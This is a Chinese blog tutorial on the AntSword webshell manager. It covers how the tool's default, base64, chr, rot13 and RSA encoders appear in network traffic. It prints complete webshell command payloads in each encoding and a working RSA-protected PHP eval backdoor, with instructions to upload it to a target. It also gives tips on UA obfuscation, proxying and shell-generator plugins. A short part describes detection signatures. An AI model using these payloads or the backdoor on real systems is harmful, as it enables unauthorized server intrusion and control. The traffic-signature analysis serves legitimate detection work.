攻防兼备:中国蚁剑使用指南及特征流量

已于 2023-04-12 23:12:55 修改
阅读量4.1k 收藏 19
点赞数 3
文章标签: 安全
于 2023-04-12 17:22:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/130108881
版权
本文介绍了蚁剑的不同加密方式,包括默认方式、base64、chr/chr16和rot13,指出它们的流量特征明显,容易被识别。还提到了RSA加密作为更安全的选择,但在蚁剑中的应用仍存在明显流量模式。文章强调了蚁剑在UA混淆、代理设置和插件使用方面的功能,但其流量加密的弱点使其在防御者面前不够隐蔽。
摘要由CSDN通过智能技术生成

中国蚁剑是菜刀的升级版本,线现下主流的Webshell连接工具之一,有着较广泛的使用,本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征,兼顾攻防两端。

蚁剑下载安装参考:中国蚁剑(antSword)下载、安装、使用教程_蚁剑下载_攀爬的小白的博客-CSDN博客

目录

各种加密方式对比

RSA流量加密分析

UA混淆

代理设置

插件使用

总结

各种加密方式对比

蚁剑给我们提供的加密方式由四种:

default:默认方式,不推荐

tiger=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return str_rot13($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "c8b5a";echo @asenc($output);echo "ad3f9";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

其流量特征十分清晰,ini_set(),set_time_limit(),当你看到这两个字段时,就要小心了。

这种默认方式的返回包是明文传输的,可以在数据包里面看到。

base64:只要防守人员有点经验,就会被识破

_0xe5c436e26d9c2=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIHN0cl9yb3QxMygkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI3ODE4OCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMmRhYmQiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw==&tiger=@eval(@base64_decode($_POST[_0xe5c436e26d9c2]));

流量特征典型的base64,见的多了就会快速反应到。其数据返回包是base64加密

chr/chr16

tiger=@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(115).ChR(116).ChR(114).ChR(95).ChR(114).ChR(111).ChR(116).ChR(49).ChR(51).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(56).ChR(49).ChR(56).ChR(57).ChR(99).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(99).ChR(102).ChR(56).ChR(51).ChR(50).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59));

特征也很明显,其返回包也是以明文传输的。

rot13

_0xb7628defadc01=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "no03q";rpub @nfrap($bhgchg);rpub "99nr7";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q}	";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.="	";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))?@cbfvk_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.="	{$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&tiger=@eval(@str_rot13($_POST[_0xb7628defadc01]));

特征也很明显,其返回包也是以明文传输的。

蚁剑提供的集中加密方式都不太好,很容易就会被溯源到。接下引入另外一种RSA加密

RSA流量加密分析

        RSA加密算法是一种非对称加密算法,所谓非对称,就是指该算法加密和解密使用不同的密钥,即使用加密密钥进行加密、解密密钥进行解密。在RAS算法中,加密密钥(即公开密钥)PK是公开信息,而解密密钥(即秘密密钥)SK是需要保密的。

        在后门代码里面存储着公钥,以及后门代码

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIqhgvWlSjvyQ+GsQDp5xp7/7q
E1Bojg6rQnQmumr1FNlhgduSZL6YUq9OqKK4+Mz+EYgI2qHTJMvzYTWfV2C46NkK
E0EYeCIQlZl9c6zW9JUTv7zyHpcRpcstlcJReUcf+jlvuEi88M/5YFBeirHYL/Fy
utU0iNt88FzAbiX1+wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
eval($cmd);

在后门代码里面会存储公钥,用来解密传过来的数据,但返回数据时默认的是base64编码。

具体操作:AntSword——编码设置——编码管理——RSA配置——生成,生成webshell:

 将PHP后门代码上传目标即可,默认密码是ant。

在连接时选择自定义的加密选项:

这样加密有两个缺点:

  1. webshell没有混淆,需要自己去配置
  2. 返回数据包是base64编码,还是很明显,建议配合解码器,但是需要自己写,对我这种菜鸟很不友好。

静态特征

Php中使用assert,eval执行

asp使用eval

在jsp使用的是Java类加载(ClassLoader),同时会带有base64编码解码等字符特征

UA混淆

可以修改UA头,以及数据包的Body内容进行混淆,最新版本的UA已经可以实现随机了

 但如果想要自己修改的话,可以在上面进行修改。

代理设置

 可以配合burpsuite进行抓包

插件使用

        插件的话推荐一个生成hsell的插件即可。

 可以生成多种类型的shell

参考文章:

学蚁致用(二)——RSA流量免杀_limb0的博客-CSDN博客

中国蚁剑(AntSword)安装、使用教程_丶没胡子的猫的博客-CSDN博客

webshell使用与流量分析(含数据包)_webshell流量分析_zkzq的博客-CSDN博客

感谢几位大佬的分享!!!

总结

蚁剑这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。

最后创作不易,求路过大佬点赞支持一下,谢谢!!!

Dao-道法自然
关注
中国蚁剑使用
m0_49506405的博客
01-17 659
1.在win7上phpstudy网站上,上传一句话木马 一句话木马 修改文件名为 .php 后缀 上传1.php 2.在操作机上利用中国蚁剑链接靶机上的1.php 在空白部分右键添加数据 点击添加 登录成功
攻防世界web、web shell关卡使用中国蚁剑
Lu__xiao的博客
11-30 937
访问web shell关卡进入此网站,得到下面一句话 打开,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
中国蚁剑(AntSword)使用教程
gitblog_00219的博客
08-07 772
中国蚁剑(AntSword)使用教程 项目地址:https://gitcode.com/gh_mirrors/an/antSword 项目介绍 中国蚁剑(AntSword)是一款跨平台的开源网站管理工具,旨在满足渗透测试人员的需求。它是一个功能强大的工具,可以帮助用户管理和操作远程服务器。AntSword 支持多种操作系统,包括 Windows、Linux 和 macOS。 项目快速启动 安装 ...
中国蚁剑使用教程.zip
12-12
中国蚁剑使用教程.zip 中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
中国蚁剑(antSword)下载、安装、安装出现的问题
ZzzzZ123486的博客
07-27 692
可能是杀毒软件杀掉了,关闭杀毒软件后以管理员身份打开即可解决。2.解压完成后,进入文件中,点击exe文件进行安装。1.代码解压出错:[object Object]进入网站后可自行选择版本下载。1.下载zip文件后进行解压。
流量分析
m0_56937298的博客
04-03 5825
通过Wireshark分析一句话木马
中国蚁剑安装使用教程
Karka_的博客
03-21 3512
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
中国蚁剑AntSword
04-07
中国蚁剑,又称AntSword,是一款开源的网络渗透测试工具,主要应用于CTF(Capture The Flag)竞赛和网络安全领域的安全测试与分析。这款工具以其简单易用、功能丰富的特性深受安全研究人员和爱好者喜爱。在本文中,...
antswordの加载器&源码
04-14
【蚂(AntSword)】是一款开源的Web管理工具,主要用于网站的安全检测与渗透测试。它提供了方便的界面,让安全研究人员可以便捷地进行网页的上传、下载、执行命令、数据库操作等一系列功能,帮助发现并修复网络...
中国蚁剑,AntSword-Loader-v4.0.3-win32-x64和antSword-master
09-07
中国蚁剑:AntSword-Loader与antSword-master详解》 中国蚁剑,全称为AntSword,是一款开源的Web管理工具,主要用于网站的安全检测、渗透测试以及Webshell管理。这款工具因其高效、易用的特点,在网络安全领域内...
Web安全攻防:渗透测试实战指南 (徐焱)
最新发布
08-24
Web安全攻防:渗透测试实战指南 (徐焱)
中国蚁剑(antSword)下载、安装、使用教程
qq_46603839的博客
04-29 4979
antsword
玄机平台流量特征分析-流量分析
2301_76227305的博客
06-20 720
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
菜刀、冰蝎、、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 2万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
[玄机]流量特征分析-流量分析
haosha。的博客
07-31 5532
流量特征分析-流量分析题目做法及思路解析(个人分享)
中国蚁剑流量分析
UserNick157的博客
04-25 6232
中国蚁剑流量分析 文章目录中国蚁剑流量分析1.代理2.测试连接数据包:执行代码:执行结果:3.双击连接第一个数据包数据包:第二个数据包数据包:执行代码:response:4.打开文件夹数据包:5.打开文件数据包:执行代码:6.修改文件1.修改小文件数据包:执行代码:2.修改大文件7.wget文件数据包执行代码:8.删除文件数据包:执行代码:9.上传文件1.数据包:执行代码:10.打开终端数据包执行代码:与相关功能模块源码部分知识点1.测试连接部分2.删除文件3.命令执行 1.代理 有设置代理的功能,
的配置及流量分析
weixin_48776804的博客
05-27 918
安装
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值